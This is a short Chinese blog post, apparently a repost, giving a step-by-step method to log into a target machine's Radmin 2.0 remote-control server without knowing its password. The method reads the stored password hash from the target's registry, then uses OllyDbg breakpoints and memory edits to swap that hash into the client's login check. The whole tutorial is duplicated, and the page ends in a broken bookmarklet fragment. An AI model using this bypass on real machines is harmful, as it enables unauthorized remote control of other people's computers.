Blog关了四天,郁
联想天逸100A硬盘
0
2007/09/09 
20:28 
1087
来自:影子鹰
读取目标机器注册表
HKEY_LOCAL_MACHINE\SYSTEM\RAdminv2.0\Server\Parameters\Parameter
内容如下
03,13,16,07,1d,51,f5,6a,39,65,99,8f,73,7b,1f,cf
031316071d51f56a3965998f737b1fcf
开始吧。用OD来载入RADMIN
ctrl +f 搜索 jmp eax
F4运行到所选的位置
接着F8 跟进
右键查找所有常量 输入 10325476 也就是76543210的反过来写的。
在第一行里点F2断点 。F9运行,F9运行不启动可以用shift +F9来运行
密码随意输入。这里我们输入123456
程序断下,我们输入 ctrl +F9
原始位置F2取消断点
F8跟进
00A024CE 83C4 18 ADD ESP18
在这里F4运行到所选。。
在左小角的位置输入CTRL +G 输入[esp]
从第一行开始编辑我们的hash值
目标机器的hash 值是
我们输入的123456对应的hash值是 CF C5 34 37 AD B4 B7 63 5C DA 9F D0 FC 61 F0 0B
编辑好后我们F9运行,已经不用输入密码就可以进入了。
读取目标机器注册表
HKEY_LOCAL_MACHINE\SYSTEM\RAdminv2.0\Server\Parameters\Parameter
内容如下
03,13,16,07,1d,51,f5,6a,39,65,99,8f,73,7b,1f,cf
031316071d51f56a3965998f737b1fcf
开始吧。用OD来载入RADMIN
ctrl +f 搜索 jmp eax
F4运行到所选的位置
接着F8 跟进
右键查找所有常量 输入 10325476 也就是76543210的反过来写的。
在第一行里点F2断点 。F9运行,F9运行不启动可以用shift +F9来运行
密码随意输入。这里我们输入123456
程序断下,我们输入 ctrl +F9
原始位置F2取消断点
F8跟进
00A024CE 83C4 18 ADD ESP18
在这里F4运行到所选。。
在左小角的位置输入CTRL +G 输入[esp]
从第一行开始编辑我们的hash值
目标机器的hash 值是
我们输入的123456对应的hash值是 CF C5 34 37 AD B4 B7 63 5C DA 9F D0 FC 61 F0 0B
编辑好后我们F9运行,已经不用输入密码就可以进入了。
收藏本文到网摘:
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,left=50,top=50status=no,resizable=yes'));keyit.focus();){kind=logo}
